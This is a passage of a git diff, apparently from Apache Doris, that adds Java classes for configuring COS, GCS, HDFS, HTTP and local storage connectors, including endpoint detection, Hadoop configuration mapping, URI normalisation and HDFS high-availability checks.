      + * Group(1) captures the region name. + */ + private static final Set ENDPOINT_PATTERN = ImmutableSet.of( + Pattern.compile("^(?:https?://)?cos\\.([a-z0-9-]+)\\.myqcloud\\.com$")); + + protected COSProperties(Map origProps) { + super(Type.COS, origProps); + } + + public static COSProperties of(Map properties) { + COSProperties propertiesObj = new COSProperties(properties); + ConnectorPropertiesUtils.bindConnectorProperties(propertiesObj, properties); + propertiesObj.initNormalizeAndCheckProps(); + propertiesObj.initializeHadoopStorageConfig(); + return propertiesObj; + } + + protected static boolean guessIsMe(Map origProps) { + String value = Stream.of("cos.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT") + .map(origProps::get) + .filter(Objects::nonNull) + .findFirst() + .orElse(null); + if (!Strings.isNullOrEmpty(value)) { + return value.contains("myqcloud.com"); + } + Optional uriValue = origProps.entrySet().stream() + .filter(e -> e.getKey().equalsIgnoreCase("uri")) + .map(Map.Entry::getValue) + .findFirst(); + return uriValue.isPresent() && uriValue.get().contains("myqcloud.com"); + } + + @Override + protected Set endpointPatterns() { + return ENDPOINT_PATTERN; + } + + @Override + public void initializeHadoopStorageConfig() { + super.initializeHadoopStorageConfig(); + hadoopConfigMap.put("fs.cos.impl", "org.apache.hadoop.fs.s3a.S3AFileSystem"); + hadoopConfigMap.put("fs.cosn.impl", "org.apache.hadoop.fs.s3a.S3AFileSystem"); + hadoopConfigMap.put("fs.cosn.bucket.region", region); + hadoopConfigMap.put("fs.cosn.userinfo.secretId", accessKey); + hadoopConfigMap.put("fs.cosn.userinfo.secretKey", secretKey); + } + + @Override + protected Set schemas() { + return ImmutableSet.of("cos", "cosn"); + } +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/GCSProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/GCSProperties.java new file mode 100644 index 00000000000000..a7b2d6ada9a9e5 --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/GCSProperties.java @@ -0,0 +1,189 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import org.apache.doris.foundation.property.ConnectorProperty; + +import com.google.common.collect.ImmutableSet; +import lombok.Getter; +import lombok.Setter; +import org.apache.commons.lang3.StringUtils; + +import java.util.HashSet; +import java.util.Map; +import java.util.Set; +import java.util.regex.Pattern; + +/** + * Google Cloud Storage (GCS) properties based on the S3-compatible protocol. + * + *

      + * Key differences and considerations: + *

        + *
      • The default endpoint is {@code https://storage.googleapis.com}, which usually does not need + * to be configured unless a custom domain is required.
      • + *
      • The region is typically not relevant for GCS since it is mapped internally by bucket, + * but may still be required when using the S3-compatible API.
      • + *
      • Access Key and Secret Key are not native GCS concepts. They exist here only for compatibility + * with the S3 protocol. Google recommends using OAuth2.0, Service Accounts, or other native + * authentication methods instead.
      • + *
      • Compatibility with older versions: + *
          + *
        • Previously, the endpoint was required. For example, + * {@code gs.endpoint=https://storage.googleapis.com} is valid and backward-compatible.
        • + *
        • If a custom endpoint is used (e.g., {@code https://my-custom-endpoint.com}), + * the user must explicitly declare that this is GCS storage and configure the mapping.
        • + *
        + *
      • + *
      • Additional authentication methods (e.g., OAuth2, Service Account) may be supported in the future.
      • + *
      + *

      + */ +public class GCSProperties extends AbstractS3CompatibleProperties { + + private static final Set GS_ENDPOINT_ALIAS = ImmutableSet.of( + "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"); + + private static final String GCS_ENDPOINT_KEY_NAME = "gs.endpoint"; + + + @Setter + @Getter + @ConnectorProperty(names = {"gs.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"}, + required = false, + description = "The endpoint of GCS.") + protected String endpoint = "https://storage.googleapis.com"; + + @Getter + protected String region = "us-east1"; + + @Getter + @ConnectorProperty(names = {"gs.access_key", "s3.access_key", "AWS_ACCESS_KEY", "access_key", "ACCESS_KEY"}, + required = false, + sensitive = true, + description = "The access key of GCS.") + protected String accessKey = ""; + + @Getter + @ConnectorProperty(names = {"gs.secret_key", "s3.secret_key", "AWS_SECRET_KEY", "secret_key", "SECRET_KEY"}, + required = false, + sensitive = true, + description = "The secret key of GCS.") + protected String secretKey = ""; + + @Getter + @ConnectorProperty(names = {"gs.session_token", "s3.session_token", "session_token"}, + required = false, + description = "The session token of GCS.") + protected String sessionToken = ""; + + /** + * The maximum number of concurrent connections that can be made to the object storage system. + * This value is optional and can be configured by the user. + */ + @Getter + @ConnectorProperty(names = {"gs.connection.maximum", "s3.connection.maximum"}, required = false, + description = "Maximum number of connections.") + protected String maxConnections = "100"; + + /** + * The timeout (in milliseconds) for requests made to the object storage system. + * This value is optional and can be configured by the user. + */ + @Getter + @ConnectorProperty(names = {"gs.connection.request.timeout", "s3.connection.request.timeout"}, required = false, + description = "Request timeout in seconds.") + protected String requestTimeoutS = "10000"; + + /** + * The timeout (in milliseconds) for establishing a connection to the object storage system. + * This value is optional and can be configured by the user. + */ + @Getter + @ConnectorProperty(names = {"gs.connection.timeout", "s3.connection.timeout"}, required = false, + description = "Connection timeout in seconds.") + protected String connectionTimeoutS = "10000"; + + /** + * Flag indicating whether to use path-style URLs for the object storage system. + * This value is optional and can be configured by the user. + */ + @Getter + @ConnectorProperty(names = {"gs.use_path_style", "use_path_style", "s3.path-style-access"}, required = false, + description = "Whether to use path style URL for the storage.") + protected String usePathStyle = "false"; + + @ConnectorProperty(names = {"gs.force_parsing_by_standard_uri", "force_parsing_by_standard_uri"}, required = false, + description = "Whether to use path style URL for the storage.") + @Getter + protected String forceParsingByStandardUrl = "false"; + + /** + * Constructor to initialize the object storage properties with the provided type and original properties map. + * + * @param origProps the original properties map. + */ + protected GCSProperties(Map origProps) { + super(Type.GCS, origProps); + } + + public static boolean guessIsMe(Map props) { + // check has gcs specific keys,ignore case + if (props.containsKey(GCS_ENDPOINT_KEY_NAME) && StringUtils.isNotBlank(props.get(GCS_ENDPOINT_KEY_NAME))) { + return true; + } + String endpoint; + for (String key : props.keySet()) { + if (GS_ENDPOINT_ALIAS.contains(key.toLowerCase())) { + endpoint = props.get(key); + if (StringUtils.isNotBlank(endpoint) && endpoint.toLowerCase().endsWith("storage.googleapis.com")) { + return true; + } + } + } + return false; + } + + @Override + protected Set endpointPatterns() { + return new HashSet<>(); + } + + + @Override + public void setRegion(String region) { + this.region = region; + } + + @Override + public void initializeHadoopStorageConfig() { + super.initializeHadoopStorageConfig(); + hadoopConfigMap.put("fs.gs.impl", "org.apache.hadoop.fs.s3a.S3AFileSystem"); + } + + public Map getBackendConfigProperties() { + Map backendProperties = generateBackendS3Configuration(); + backendProperties.put("provider", "GCP"); + return backendProperties; + } + + @Override + protected Set schemas() { + return ImmutableSet.of("gs"); + } +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsCompatibleProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsCompatibleProperties.java new file mode 100644 index 00000000000000..dea7b8f52744c5 --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsCompatibleProperties.java @@ -0,0 +1,51 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import com.google.common.collect.ImmutableSet; + +import java.util.Map; +import java.util.Set; + +public abstract class HdfsCompatibleProperties extends StorageProperties { + + + public static final String HDFS_DEFAULT_FS_NAME = "fs.defaultFS"; + + protected Map backendConfigProperties; + + protected HdfsCompatibleProperties(Type type, Map origProps) { + super(type, origProps); + } + + @Override + protected String getResourceConfigPropName() { + return "hadoop.config.resources"; + } + + @Override + public void initializeHadoopStorageConfig() { + //nothing to do + } + + @Override + protected Set schemas() { + return ImmutableSet.of("hdfs"); + } + +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsProperties.java new file mode 100644 index 00000000000000..75e3496adc594a --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsProperties.java @@ -0,0 +1,219 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import org.apache.doris.foundation.property.ConnectorProperty; +import org.apache.doris.foundation.property.StoragePropertiesException; + +import com.google.common.base.Strings; +import com.google.common.collect.ImmutableSet; +import lombok.Getter; +import org.apache.commons.collections4.MapUtils; +import org.apache.commons.lang3.StringUtils; + +import java.util.Arrays; +import java.util.HashMap; +import java.util.LinkedHashMap; +import java.util.List; +import java.util.Map; +import java.util.Set; + +public class HdfsProperties extends HdfsCompatibleProperties { + + @ConnectorProperty(names = {"hdfs.authentication.type", "hadoop.security.authentication"}, + required = false, + description = "The authentication type of HDFS. The default value is 'none'.") + private String hdfsAuthenticationType = "simple"; + + @ConnectorProperty(names = {"hdfs.authentication.kerberos.principal", "hadoop.kerberos.principal"}, + required = false, + description = "The principal of the kerberos authentication.") + private String hdfsKerberosPrincipal = ""; + + @ConnectorProperty(names = {"hdfs.authentication.kerberos.keytab", "hadoop.kerberos.keytab"}, + required = false, + description = "The keytab of the kerberos authentication.") + private String hdfsKerberosKeytab = ""; + + @ConnectorProperty(names = {"hadoop.username"}, + required = false, + description = "The username of Hadoop. Doris will user this user to access HDFS") + private String hadoopUsername = ""; + + @ConnectorProperty(names = {"hdfs.impersonation.enabled"}, + required = false, + supported = false, + description = "Whether to enable the impersonation of HDFS.") + private boolean hdfsImpersonationEnabled = false; + + @ConnectorProperty(names = {"ipc.client.fallback-to-simple-auth-allowed"}, + required = false, + description = "Whether to allow fallback to simple authentication.") + private String allowFallbackToSimpleAuth = ""; + + + @ConnectorProperty(names = {"fs.defaultFS"}, required = false, description = "") + protected String fsDefaultFS = ""; + + @ConnectorProperty(names = {"hadoop.config.resources"}, + required = false, + description = "The xml files of Hadoop configuration.") + protected String hadoopConfigResources = ""; + + private String dfsNameServices; + + /** + * Whether this HDFS storage is explicitly configured by user. + * If false, this instance is auto-created by framework as a fallback storage, + * and should skip connectivity test. + */ + @Getter + private final boolean explicitlyConfigured; + + private static final String DFS_NAME_SERVICES_KEY = "dfs.nameservices"; + + private static final Set supportSchema = ImmutableSet.of("hdfs", "viewfs", "jfs"); + + /** + * The final HDFS configuration map that determines the effective settings. + * Priority rules: + * 1. If a key exists in `overrideConfig` (user-provided settings), its value takes precedence. + * 2. If a key is not present in `overrideConfig`, the value from `hdfs-site.xml` or `core-site.xml` is used. + * 3. This map should be used to read the resolved HDFS configuration, ensuring the correct precedence is applied. + */ + private Map userOverriddenHdfsConfig; + + private static final List HDFS_PROPERTIES_KEYS = Arrays.asList("hdfs.authentication.type", + "hadoop.security.authentication", "hadoop.username", "fs.defaultFS", + "hdfs.authentication.kerberos.principal", "hadoop.kerberos.principal", DFS_NAME_SERVICES_KEY, + "hdfs.config.resources"); + + public HdfsProperties(Map origProps) { + this(origProps, true); + } + + public HdfsProperties(Map origProps, boolean explicitlyConfigured) { + super(Type.HDFS, origProps); + this.explicitlyConfigured = explicitlyConfigured; + } + + public static boolean guessIsMe(Map props) { + if (MapUtils.isEmpty(props)) { + return false; + } + if (HdfsPropertiesUtils.validateUriIsHdfsUri(props, supportSchema)) { + return true; + } + return HDFS_PROPERTIES_KEYS.stream().anyMatch(props::containsKey); + } + + @Override + public void initNormalizeAndCheckProps() { + super.initNormalizeAndCheckProps(); + if (StringUtils.isBlank(fsDefaultFS)) { + this.fsDefaultFS = HdfsPropertiesUtils.extractDefaultFsFromUri(origProps, supportSchema); + } + extractUserOverriddenHdfsConfig(origProps); + initBackendConfigProperties(); + this.hadoopConfigMap = new LinkedHashMap<>(); + this.backendConfigProperties.forEach(hadoopConfigMap::put); + HdfsPropertiesUtils.checkHaConfig(backendConfigProperties); + } + + private void extractUserOverriddenHdfsConfig(Map origProps) { + if (MapUtils.isEmpty(origProps)) { + return; + } + userOverriddenHdfsConfig = new HashMap<>(); + origProps.forEach((key, value) -> { + if (key.startsWith("hadoop.") || key.startsWith("dfs.") || key.startsWith("fs.") + || key.startsWith("juicefs.")) { + userOverriddenHdfsConfig.put(key, value); + } + }); + + } + + protected void checkRequiredProperties() { + super.checkRequiredProperties(); + if ("kerberos".equalsIgnoreCase(hdfsAuthenticationType) && (Strings.isNullOrEmpty(hdfsKerberosPrincipal) + || Strings.isNullOrEmpty(hdfsKerberosKeytab))) { + throw new IllegalArgumentException("HDFS authentication type is kerberos, " + + "but principal or keytab is not set."); + } + } + + private void initBackendConfigProperties() { + Map props = loadConfigFromFile(hadoopConfigResources); + if (MapUtils.isNotEmpty(userOverriddenHdfsConfig)) { + props.putAll(userOverriddenHdfsConfig); + } + if (StringUtils.isNotBlank(fsDefaultFS)) { + props.put(HDFS_DEFAULT_FS_NAME, fsDefaultFS); + } + if (StringUtils.isNotBlank(allowFallbackToSimpleAuth)) { + props.put("ipc.client.fallback-to-simple-auth-allowed", allowFallbackToSimpleAuth); + } else { + props.put("ipc.client.fallback-to-simple-auth-allowed", "true"); + } + props.put("hdfs.security.authentication", hdfsAuthenticationType); + if ("kerberos".equalsIgnoreCase(hdfsAuthenticationType)) { + props.put("hadoop.security.authentication", "kerberos"); + props.put("hadoop.kerberos.principal", hdfsKerberosPrincipal); + props.put("hadoop.kerberos.keytab", hdfsKerberosKeytab); + } + if (StringUtils.isNotBlank(hadoopUsername)) { + props.put("hadoop.username", hadoopUsername); + } + this.dfsNameServices = props.getOrDefault(DFS_NAME_SERVICES_KEY, ""); + if (StringUtils.isBlank(fsDefaultFS)) { + this.fsDefaultFS = props.getOrDefault(HDFS_DEFAULT_FS_NAME, ""); + } + this.backendConfigProperties = props; + } + + public boolean isKerberos() { + return "kerberos".equalsIgnoreCase(hdfsAuthenticationType); + } + + //fixme be should send use input params + @Override + public Map getBackendConfigProperties() { + return backendConfigProperties; + } + + @Override + public String validateAndNormalizeUri(String url) throws StoragePropertiesException { + return HdfsPropertiesUtils.convertUrlToFilePath(url, this.dfsNameServices, this.fsDefaultFS, supportSchema); + + } + + @Override + public String validateAndGetUri(Map loadProps) throws StoragePropertiesException { + return HdfsPropertiesUtils.validateAndGetUri(loadProps, this.dfsNameServices, this.fsDefaultFS, supportSchema); + } + + @Override + public String getStorageName() { + return "HDFS"; + } + + public String getDefaultFS() { + return fsDefaultFS; + } +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsPropertiesUtils.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsPropertiesUtils.java new file mode 100644 index 00000000000000..d1ec94510e4a66 --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsPropertiesUtils.java @@ -0,0 +1,275 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import org.apache.doris.foundation.property.StoragePropertiesException; + +import com.google.common.base.Strings; +import org.apache.commons.lang3.StringUtils; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.UnsupportedEncodingException; +import java.net.URI; +import java.net.URISyntaxException; +import java.net.URLDecoder; +import java.net.URLEncoder; +import java.nio.charset.StandardCharsets; +import java.util.Arrays; +import java.util.Collections; +import java.util.List; +import java.util.Map; +import java.util.Set; +import java.util.stream.Collectors; + +public class HdfsPropertiesUtils { + private static final Logger LOG = LogManager.getLogger(HdfsPropertiesUtils.class); + private static final String URI_KEY = "uri"; + private static final String STANDARD_HDFS_PREFIX = "hdfs://"; + private static final String EMPTY_HDFS_PREFIX = "hdfs:///"; + private static final String BROKEN_HDFS_PREFIX = "hdfs:/"; + private static final String SCHEME_DELIM = "://"; + private static final String NONSTANDARD_SCHEME_DELIM = ":/"; + + // Inlined from org.apache.hadoop.hdfs.client.HdfsClientConfigKeys (hadoop-hdfs-client) to keep fe-property free + // of a hadoop-hdfs dependency. These are stable, well-known HDFS HA configuration keys. + private static final String DFS_NAMESERVICES = "dfs.nameservices"; + private static final String DFS_HA_NAMENODES_KEY_PREFIX = "dfs.ha.namenodes"; + private static final String DFS_NAMENODE_RPC_ADDRESS_KEY = "dfs.namenode.rpc-address"; + private static final String DFS_HA_FAILOVER_PROXY_PROVIDER_KEY_PREFIX = "dfs.client.failover.proxy.provider"; + + public static String validateAndGetUri(Map props, String host, String defaultFs, + Set supportSchemas) throws StoragePropertiesException { + if (props.isEmpty()) { + throw new StoragePropertiesException("props is empty"); + } + String uriStr = getUri(props); + if (StringUtils.isBlank(uriStr)) { + throw new StoragePropertiesException("props must contain uri"); + } + return validateAndNormalizeUri(uriStr, host, defaultFs, supportSchemas); + } + + public static boolean validateUriIsHdfsUri(Map props, + Set supportSchemas) { + String uriStr = getUri(props); + if (StringUtils.isBlank(uriStr)) { + return false; + } + URI uri; + try { + uri = URI.create(uriStr); + } catch (Exception ex) { + // The glob syntax of s3 contains {, which will cause an error here. + LOG.warn("Failed to validate uri is hdfs uri, {}", ex.getMessage()); + return false; + } + String schema = uri.getScheme(); + if (StringUtils.isBlank(schema)) { + throw new IllegalArgumentException("Invalid uri: " + uriStr + ", extract schema is null"); + } + return isSupportedSchema(schema, supportSchemas); + } + + public static String extractDefaultFsFromPath(String filePath) { + if (StringUtils.isBlank(filePath)) { + return null; + } + URI uri = URI.create(filePath); + return uri.getScheme() + "://" + uri.getAuthority(); + } + + public static String extractDefaultFsFromUri(Map props, Set supportSchemas) { + String uriStr = getUri(props); + if (StringUtils.isBlank(uriStr)) { + return null; + } + URI uri = URI.create(uriStr); + if (!isSupportedSchema(uri.getScheme(), supportSchemas)) { + return null; + } + return uri.getScheme() + "://" + uri.getAuthority(); + } + + public static String convertUrlToFilePath(String uriStr, String host, + String defaultFs, Set supportSchemas) { + return validateAndNormalizeUri(uriStr, host, defaultFs, supportSchemas); + } + + public static String convertUrlToFilePath(String uriStr, String host, Set supportSchemas) { + return validateAndNormalizeUri(uriStr, host, null, supportSchemas); + } + + /* + * Extracts the URI value from the given properties. + * If multiple URIs are specified (separated by commas), this method returns null. + * Note: Some storage systems may support multiple URIs (e.g., for load balancing or multi-host), + * but in the HDFS scenario, fs.defaultFS only supports a single URI. + * Therefore, such a format is considered invalid for HDFS. so, just return null. + */ + private static String getUri(Map props) { + String uriValue = props.entrySet().stream() + .filter(e -> e.getKey().equalsIgnoreCase(URI_KEY)) + .map(Map.Entry::getValue) + .filter(StringUtils::isNotBlank) + .findFirst() + .orElse(null); + if (uriValue == null) { + return null; + } + String[] uris = uriValue.split(","); + if (uris.length > 1) { + return null; + } + return uriValue; + } + + private static boolean isSupportedSchema(String schema, Set supportSchema) { + return schema != null && supportSchema.contains(schema.toLowerCase()); + } + + public static String validateAndNormalizeUri(String location, Set supportedSchemas) { + return validateAndNormalizeUri(location, null, null, supportedSchemas); + } + + public static String validateAndNormalizeUri(String location, String host, String defaultFs, + Set supportedSchemas) { + if (StringUtils.isBlank(location)) { + throw new IllegalArgumentException("Property 'uri' is required."); + } + if (!(location.contains(SCHEME_DELIM) || location.contains(NONSTANDARD_SCHEME_DELIM)) + && StringUtils.isNotBlank(defaultFs)) { + location = defaultFs + location; + } + try { + // Encode the location string, but keep '/' and ':' unescaped to preserve URI structure + String newLocation = URLEncoder.encode(location, StandardCharsets.UTF_8.name()) + .replace("%2F", "/") + .replace("%3A", ":"); + + URI uri = new URI(newLocation).normalize(); + + boolean isSupportedSchema = isSupportedSchema(uri.getScheme(), supportedSchemas); + if (!isSupportedSchema) { + throw new IllegalArgumentException("Unsupported schema: " + uri.getScheme()); + } + // compatible with 'hdfs:///' or 'hdfs:/' + if (StringUtils.isEmpty(uri.getHost())) { + newLocation = URLDecoder.decode(newLocation, StandardCharsets.UTF_8.name()); + if (newLocation.startsWith(BROKEN_HDFS_PREFIX) && !newLocation.startsWith(STANDARD_HDFS_PREFIX)) { + newLocation = newLocation.replace(BROKEN_HDFS_PREFIX, STANDARD_HDFS_PREFIX); + } + if (StringUtils.isNotEmpty(host)) { + // Replace 'hdfs://key/' to 'hdfs://name_service/key/' + // Or hdfs:///abc to hdfs://name_service/abc + if (newLocation.startsWith(EMPTY_HDFS_PREFIX)) { + return newLocation.replace(STANDARD_HDFS_PREFIX, STANDARD_HDFS_PREFIX + host); + } else { + return newLocation.replace(STANDARD_HDFS_PREFIX, STANDARD_HDFS_PREFIX + host + "/"); + } + } else { + // 'hdfs://null/' equals the 'hdfs:///' + if (newLocation.startsWith(EMPTY_HDFS_PREFIX)) { + // Do not support hdfs:///location + throw new RuntimeException("Invalid location with empty host: " + newLocation); + } else { + // Replace 'hdfs://key/' to '/key/', try access local NameNode on BE. + return newLocation.replace(STANDARD_HDFS_PREFIX, "/"); + } + } + } + // Normal case: decode and return the fully-qualified URI + return URLDecoder.decode(newLocation, StandardCharsets.UTF_8.name()); + + } catch (URISyntaxException | UnsupportedEncodingException e) { + throw new StoragePropertiesException("Failed to parse URI: " + location, e); + } + } + + /** + * Validate the required HDFS HA configuration properties. + * + *

      This method checks the following: + *

        + *
      • {@code dfs.nameservices} must be defined if HA is enabled.
      • + *
      • {@code dfs.ha.namenodes.} must be defined and contain at least 2 namenodes.
      • + *
      • For each namenode, {@code dfs.namenode.rpc-address..} must be defined.
      • + *
      • {@code dfs.client.failover.proxy.provider.} must be defined.
      • + *
      + * + * @param hdfsProperties configuration map (similar to core-site.xml/hdfs-site.xml properties) + */ + public static void checkHaConfig(Map hdfsProperties) { + if (hdfsProperties == null) { + return; + } + // 1. Check dfs.nameservices + String dfsNameservices = hdfsProperties.getOrDefault(DFS_NAMESERVICES, ""); + if (Strings.isNullOrEmpty(dfsNameservices)) { + // No nameservice configured => HA is not enabled, nothing to validate + return; + } + for (String dfsservice : splitAndTrim(dfsNameservices)) { + if (dfsservice.isEmpty()) { + continue; + } + // 2. Check dfs.ha.namenodes. + String haNnKey = DFS_HA_NAMENODES_KEY_PREFIX + "." + dfsservice; + String namenodes = hdfsProperties.getOrDefault(haNnKey, ""); + if (Strings.isNullOrEmpty(namenodes)) { + throw new IllegalArgumentException("Missing property: " + haNnKey); + } + List names = splitAndTrim(namenodes); + if (names.size() < 2) { + throw new IllegalArgumentException("HA requires at least 2 namenodes for service: " + dfsservice); + } + // 3. Check dfs.namenode.rpc-address.. + for (String name : names) { + String rpcKey = DFS_NAMENODE_RPC_ADDRESS_KEY + "." + dfsservice + "." + name; + String address = hdfsProperties.getOrDefault(rpcKey, ""); + if (Strings.isNullOrEmpty(address)) { + throw new IllegalArgumentException("Missing property: " + rpcKey + " (expected format: host:port)"); + } + } + // 4. Check dfs.client.failover.proxy.provider. + String failoverKey = DFS_HA_FAILOVER_PROXY_PROVIDER_KEY_PREFIX + "." + dfsservice; + String failoverProvider = hdfsProperties.getOrDefault(failoverKey, ""); + if (Strings.isNullOrEmpty(failoverProvider)) { + throw new IllegalArgumentException("Missing property: " + failoverKey); + } + } + } + + /** + * Utility method to split a comma-separated string, trim whitespace, + * and remove empty tokens. + * + * @param s the input string + * @return list of trimmed non-empty values + */ + private static List splitAndTrim(String s) { + if (Strings.isNullOrEmpty(s)) { + return Collections.emptyList(); + } + return Arrays.stream(s.split(",")) + .map(String::trim) + .filter(tok -> !tok.isEmpty()) + .collect(Collectors.toList()); + } +} + diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/HttpProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/HttpProperties.java new file mode 100644 index 00000000000000..7da6f5007571f4 --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/HttpProperties.java @@ -0,0 +1,92 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import org.apache.doris.foundation.property.StoragePropertiesException; + +import com.google.common.collect.ImmutableSet; +import com.google.common.collect.Maps; +import org.apache.commons.collections4.MapUtils; + +import java.util.Map; +import java.util.Set; + +public class HttpProperties extends StorageProperties { + private static final ImmutableSet HTTP_PROPERTIES = new ImmutableSet.Builder() + .add(StorageProperties.FS_HTTP_SUPPORT) + .build(); + + public HttpProperties(Map origProps) { + super(Type.HTTP, origProps); + } + + @Override + public Map getBackendConfigProperties() { + return origProps; + } + + @Override + public String validateAndNormalizeUri(String url) throws StoragePropertiesException { + if (url == null || (!url.startsWith("http://") && !url.startsWith("https://") && !url.startsWith("hf://"))) { + throw new StoragePropertiesException("Invalid http/hf url: " + url); + } + return url; + } + + @Override + public String validateAndGetUri(Map props) throws StoragePropertiesException { + String url = props.get(URI_KEY); + return validateAndNormalizeUri(url); + } + + public static boolean guessIsMe(Map props) { + return !MapUtils.isEmpty(props) + && HTTP_PROPERTIES.stream().anyMatch(props::containsKey); + } + + public String getUri() { + return origProps.get(URI_KEY); + } + + @Override + public String getStorageName() { + return "http"; + } + + @Override + public void initializeHadoopStorageConfig() { + // not used + hadoopConfigMap = null; + } + + @Override + protected Set schemas() { + return ImmutableSet.of("http"); + } + + public Map getHeaders() { + Map headers = Maps.newHashMap(); + for (Map.Entry entry : origProps.entrySet()) { + if (entry.getKey().toLowerCase().startsWith("http.header.")) { + String headerKey = entry.getKey().substring("http.header.".length()); + headers.put(headerKey, entry.getValue()); + } + } + return headers; + } +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/LocalProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/LocalProperties.java new file mode 100644 index 00000000000000..d43879389abe0d --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/LocalProperties.java @@ -0,0 +1,89 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import org.apache.doris.foundation.property.StoragePropertiesException; + +import com.google.common.collect.ImmutableSet; +import org.apache.commons.collections4.MapUtils; + +import java.util.LinkedHashMap; +import java.util.Map; +import java.util.Set; + +public class LocalProperties extends StorageProperties { + public static final String PROP_FILE_PATH = "file_path"; + + // This backend is user specified backend for listing files, fetching file schema and executing query. + private long backendId; + // This backend if for listing files and fetching file schema. + // If "backendId" is set, "backendIdForRequest" will be set to "backendId", + // otherwise, "backendIdForRequest" will be set to one of the available backends. + private long backendIdForRequest = -1; + private boolean sharedStorage = false; + + private static final ImmutableSet LOCATION_PROPERTIES = new ImmutableSet.Builder() + .add(PROP_FILE_PATH) + .build(); + + public LocalProperties(Map origProps) { + super(Type.LOCAL, origProps); + } + + public static boolean guessIsMe(Map props) { + if (MapUtils.isEmpty(props)) { + return false; + } + if (LOCATION_PROPERTIES.stream().anyMatch(props::containsKey)) { + return true; + } + return false; + } + + @Override + public Map getBackendConfigProperties() { + return origProps; + } + + @Override + public String validateAndNormalizeUri(String url) throws StoragePropertiesException { + return url; + } + + @Override + public String validateAndGetUri(Map loadProps) throws StoragePropertiesException { + return loadProps.get(PROP_FILE_PATH); + } + + @Override + public String getStorageName() { + return "local"; + } + + @Override + public void initializeHadoopStorageConfig() { + hadoopConfigMap = new 